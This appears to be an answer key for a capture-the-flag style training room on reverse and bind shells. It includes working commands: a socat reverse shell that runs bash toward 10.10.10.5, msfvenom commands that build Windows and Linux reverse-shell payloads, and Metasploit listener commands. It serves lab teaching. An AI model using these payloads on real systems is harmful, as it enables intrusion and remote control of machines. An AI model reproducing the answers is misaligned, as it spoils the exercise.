What the shell?
An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.
Task 3
Note: Tasks 1 and 2 need no answer.
Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?
A: R
Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)
A: N
Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?
A: T
Task 4 Netcat
Q: Which option tells netcat to listen?
A: -l
Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?
A: nc 10.10.10.11 8080
Task 5 Netcat Shell Stabilisation
Q: How would you change your terminal size to have 238 columns?
A: stty cols 238
Q: What is the syntax for setting up a Python3 webserver on port 80?
A: sudo python3 -m http.server 80
Task 6 Socat
Q: How would we get socat to listen on TCP port 8080?
A: TCP-L:8080
Task 7 Socat Encrypted Shells
Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"
A: socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
Q: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?
A: socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Task 8 Common Shell Payloads
Q: What command can be used to create a named pipe in Linux?
A: mkfifo
Task 9 msfvenom
Q: Generate a staged reverse shell for a 64-bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port
A: msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port number>
Q: Which symbol is used to show that a shell is stageless?
A: _
Q: What command would you use to generate a staged meterpreter reverse shell for a 64-bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell
A: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443
Task 10 Metasploit multi/handler
Q: What command can be used to start a listener in the background?
A: exploit -j
Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?
A: sessions 10